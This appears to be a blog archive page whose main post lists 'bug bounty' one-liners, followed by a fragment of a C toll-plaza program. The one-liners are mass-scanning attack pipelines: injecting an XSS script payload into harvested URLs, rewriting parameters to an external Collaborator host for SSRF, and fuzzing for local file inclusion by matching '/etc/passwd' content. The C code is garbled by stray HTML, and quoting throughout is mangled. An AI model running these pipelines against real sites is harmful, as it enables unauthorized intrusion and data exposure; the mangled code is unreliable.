Posts

Showing posts from February 11, 2021

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

Coding for Tool Plaza in C

Image
#include<div><stdio .h="">    #include<stdlib .h="">    #include<conio .h="">   void GL(void);   void GS(void);   void line(void);   void line1(void); //for calling function    int main()//main function {   int a,b,n,o;   int A=0,H=0,I=0,P=0,L=0;   int amount=0;   int count=0;   int s=0,m=0,h=0,g=0;   int s1=0,m1=0,h1=0,g1=0;   int s2=0,m2=0,h2=0,g2=0;   int s3=0,m3=0,h3=0,g3=0;   int s4=0,m4=0,h4=0,g4=0;   printf("\n:osama Anam.....\n");   line();   printf("\n\n");   GL();     printf("\t\t\t\xb\xb\xb\xb**********(((()))) MANSEHRA__INTERCHANGE (((())))*********\xb\xb\xb\xb\n");     GL();     GL();   while(int i=8)  {     system("COLOR A0");     // main menu     printf("\n\n\nSelect Interchange\n");     line();     printf("\n**** press ...

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C